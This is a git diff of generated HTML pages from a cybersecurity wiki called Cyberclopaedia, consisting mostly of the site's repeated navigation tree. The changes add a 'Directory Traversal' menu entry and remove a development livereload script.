      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -195,22 +195,6 @@

Introduction - - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Padding Oracle Attack.html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Padding Oracle Attack.html index d65228d6..c789be9a 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Padding Oracle Attack.html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/Padding Oracle Attack.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -202,22 +202,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/index.html b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/index.html index 6c5d04ff..0cc94d0a 100644 --- a/docs/Cryptography/Private-Key Cryptography/Block Ciphers/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Block Ciphers/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -219,22 +219,6 @@

Implementation< - - diff --git a/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Fixed-Length MACs.html b/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Fixed-Length MACs.html index f4c9cd55..a6aa5c39 100644 --- a/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Fixed-Length MACs.html +++ b/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Fixed-Length MACs.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
